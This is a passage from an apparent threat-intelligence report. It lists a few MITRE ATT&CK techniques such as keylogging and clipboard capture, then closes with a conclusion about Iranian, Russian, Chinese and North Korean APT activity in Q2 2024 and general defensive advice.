Collection T1056.001 Input Capture: Keylogging
Collection T1115 Clipboard Data
Command and Control T1071 Application Layer Protocol
CONCLUSION
In Q2 2024, the APT landscape showcased intensified efforts by Iranian, Russian, Chinese, and North Korean cyber actors. These groups have demonstrated advanced capabilities and strategic intent across various regions and sectors, emphasizing the critical need for heightened cybersecurity measures. To mitigate these evolving threats, it is imperative for organizations to prioritize continuous monitoring, robust defense mechanisms, and comprehensive user education, ensuring proactive and adaptive responses to protect against the diverse and dynamic landscape of cyber espionage and cybercrime.